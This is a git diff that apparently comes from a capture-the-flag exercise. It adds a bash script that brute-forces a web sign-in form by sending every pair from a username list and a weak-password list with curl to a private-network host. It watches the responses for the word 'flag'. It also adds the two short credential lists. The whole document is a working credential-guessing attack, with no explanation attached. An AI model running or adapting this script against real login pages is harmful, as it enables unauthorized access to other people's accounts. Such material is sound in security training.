diff --git a/Admin_sql_injection/ressources/bruteforce.sh b/Admin_sql_injection/ressources/bruteforce.sh
new file mode 100644
index 0000000..9edfb24
--- /dev/null
+++ b/Admin_sql_injection/ressources/bruteforce.sh
@@ -0,0 +1,16 @@
+
+test_url() {
+	echo "test user $1, pass $2"
+	curl "http://10.12.248.148/?page=signin&username=$1&Login=Login&password=$2" 2> /dev/null | grep -i flag
+	if [ $? -eq 0 ]; then
+		echo "FOUND"
+		exit
+	fi
+}
+
+while read -r username; do
+	while read -r password; do
+		test_url "$username" "$password"
+	done < passwords.txt
+done < usernames.txt
+
diff --git a/Admin_sql_injection/ressources/passwords.txt b/Admin_sql_injection/ressources/passwords.txt
new file mode 100644
index 0000000..2ba36ce
--- /dev/null
+++ b/Admin_sql_injection/ressources/passwords.txt
@@ -0,0 +1,7 @@
+password
+password1
+qwerty
+12345678
+shadow
+admin
+111111
diff --git a/Admin_sql_injection/ressources/usernames.txt b/Admin_sql_injection/ressources/usernames.txt
new file mode 100644
index 0000000..3d2b7f8
--- /dev/null
+++ b/Admin_sql_injection/ressources/usernames.txt
@@ -0,0 +1,6 @@
+root
+admin
+test
+guest
+info
+adm